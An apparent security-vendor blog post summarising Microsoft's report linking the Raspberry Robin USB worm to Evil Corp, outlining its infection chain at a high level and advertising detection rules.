Raspberry Robin Malware Detection: New Connections Revealed

Raspberry Robin Malware

In late July, Microsoft researchers released new evidence linking Raspberry Robin Windows worm to the activity of the russia-backed Evil Corp gang. Raspberry Robin, a USB-based worm designed as a malware loader, shows similar functionality and structural elements to those of Dridex malware, indicating that a notorious Evil Corp group may be behind the new wave of attacks.

In 2019 the US Department of the Treasury sanctioned this prolific cybercriminal organization for Dridex malware attacks that caused more than $100 million in damages.

Raspberry Robin Malware Detection

To proactively defend against Raspberry Robin infection, SOC Prime professionals released context-enriched Sigma rules:

Sigma rules to detect the malicious presence of Raspberry Robin malware

The rules are aligned with the MITRE ATT&CK® framework v.10, compatible with 26 SIEM, EDR, and XDR solutions supported by SOC Prime’s platform.

SOC professionals dedicated to keeping up with the latest trends shaping the current cyber threat landscape can benefit from leveraging SOC Prime’s industry-first Cyber Threats Search Engine. Press the Explore Threat Context button to instantly navigate the pool of detection algorithms enriched with ATT&CK mapping and advance your proactive Threat Hunting routine.

Explore Detections  

Raspberry Robin Malware Analysis

In the disclosure from the 26th of July 2022, the tech giant reveals that the number of observed infections in the wild has reached millions of attacks that had no clear post-exploitation objectives until recently. Since this cluster of activity was detailed by Red Canary in September 2021, Raspberry Robin, also known under the moniker QNAP Worm (for initial abuse of QNAP Devices) kept the tricks up its sleeve. Last month, security researchers detected the infections delivering FAKEUPDATES malware, also known as SocGholish, linking the attacks to DEV-0206 and DEV-0243 (aka Evil Corp).

Raspberry Robin’s infection process starts with compromising a device with a malicious Microsoft shortcut (.LNK) file, normally delivered via a USB device. When the victim-to-be opens the file, it results in an MSI installer fetch and execution from a C2 domain. To establish a foothold within an infected system, the malware creates a registry key, securing that the same DLL is injected into rundll32.exe after each boot.

Enhance your chances of reducing dwell time and nullifying the adversaries before the damage is done by utilizing innovative tools and solutions delivered by a team of dedicated professionals from SOC Prime. Register for upcoming online events and check out a vast collection of educational materials available in the Cyber Library.

Was this article helpful?

Like and share it with your peers.
Join SOC Prime's Detection as Code platform to improve visibility into threats most relevant to your business. To help you get started and drive immediate value, book a meeting now with SOC Prime experts.

Related Posts